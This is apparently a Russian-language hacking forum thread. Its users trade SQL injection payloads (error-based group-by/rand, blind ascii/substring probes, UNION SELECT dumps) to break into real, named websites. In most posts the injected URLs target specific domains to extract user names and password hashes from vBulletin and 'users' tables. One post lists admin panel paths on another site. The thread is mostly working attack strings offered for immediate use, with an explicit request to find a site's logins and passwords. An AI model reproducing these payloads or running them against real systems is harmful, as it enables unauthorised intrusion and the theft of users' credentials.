/path/to/script?id= Code: if ($id){ #Fields that can be viewed only. $sql = "SELECT p1.ex, p1.pre, p1.batch_no, p1.sh_country, "; $sql .= "p1.sub, p1.ta, p1.t, p1.shg, p1.total, p1.totht, p1.passcode, "; $sql .= "DATE_FORMAT(p1.date, '%M %D, %Y, %h:%i %p') AS date "; $sql .= "FROM table1 p1, table2 p2 WHERE "; $sql .= "p1.id = p2.id AND p1.id = '$id'"; $result = mysql_query($sql); ... mysql 3. слепая. можно что-нить придумать чтобы вытащить все поля из table1 и table2? имена полей известны
PHP: /path/to/script?id=1' or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1-- только подзапросы поддерживаться не будут.
я не очень понимаю твою мысль, как по твойму будет выглядеть запрос к БД и каким образом это обойдет ковычки? по-мойму запрос будет такой: Code: SELECT bla,bla,bla FROM table1 p1, table2 p2 WHERE p1.id = p2.id AND p1.id = '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--' и запрос ничего не вернет т.к. нет такого поле, где id равно строке '1 or 1 group by concat(version(),floor(rand(0)*2))having min(0) or 1--'
Верный запрос: Code: 1'+or+1+group+by+concat(version(),floor(rand(0)*2))+having+min(0)+or+1 -- a Но не в этом суть. В любом случае, не используя подзапросы, кроме как узнать версию и читать файлы на сервере, ничего сделать нельзя, так что, в данном случае, смысла в этом методе я не вижу. Все поля из таблиц вытащить не удастся. Вытащить можно только те поля, которые участвуют в запросе, так как нельзя использовать объединение запросов через union. Все что можно сделать это: Code: 1'+and+ascii(substring(password,1,1))>66 -- a Code: 1'+and+substring(password,1,1)='f' -- a По тому куску кода, что ты выложил, что и как фильтруется сказать нельзя.
я так не думаю т.к. уже вытащил пол таблицы методом слепой скули а-ля: Code: id=1+AND+128>ascii(mid(column,1,1)) фишка в том, как вы понимаете, что вытащить можно хоть все поля всех записей из нужной таблицы, если данный запрос уязвим. Здесь вообще речь не об этом, а о том как обойти эти кавычки. Код скрипта обработчика я привел, но каким-то макаром если я подставляю ковычку в Code: script.php?id=1' на странице все равно верный результат т.е. кавычка как-то фильтруется, так вот как она фильтруется и как это обойти?
http://www.basket-chel.ru/site/index/news/?id=167%27+and+1=0+UnIon+selECt+1,2,3,4,username,6,7,8,9,10+from+vbbusers+--+ чё не так делаю?
http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,3,4,5,6,7,8,9,10+from+vbb_users--+ _ потерял...смотри внимательнее как табла называется и с какого перепугу ты колонку тоже неправильно написал? версия 5 , выводи все правильно... http://www.basket-chel.ru/site/index/news/?id=-167%27+union+select+1,2,name,pwd,5,6,7,8,9,10+from+vbb_users--+
www.ealandmania.net/admin www.ealandmania.net/controlpanel/ www.ealandmania.net/cpanel/ www.ealandmania.net/kpanel/
-PRIVAT- tnx Помогите докрутить скулю, не могу подобрать кол-во колонок, пробывал ч-з blind не выходит http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5%20order%20by%203%20--
Code: http://www.markus-schmitz.info/CoMaSys/index.php?SID=owbmptuuq&action=cms&id=5+and+row(1,2)in(select+count(*),concat((select+table_name+from+information_schema.tables+limit+0,1),0x3a,floor(rand(0)*2))as+a+from+information_schema.tables+x+group+by+a) Дальше лимитом перебирай
помогите найти логины и пароли сайта kitcom.ru SQL inj: http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,database()
http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,version()+--+ В 4.1.21 нету information_schema , значит не получится вывести таблицу с аккаунтами ... Как выриант брутить таблицы http://www.kitcom.ru/goods/index.php?gm=-138+union+select+1,2,concat_ws(0x3a,login,pwd)+from+users+--+ Подабрал users,accounts - дальше сам пробуй )
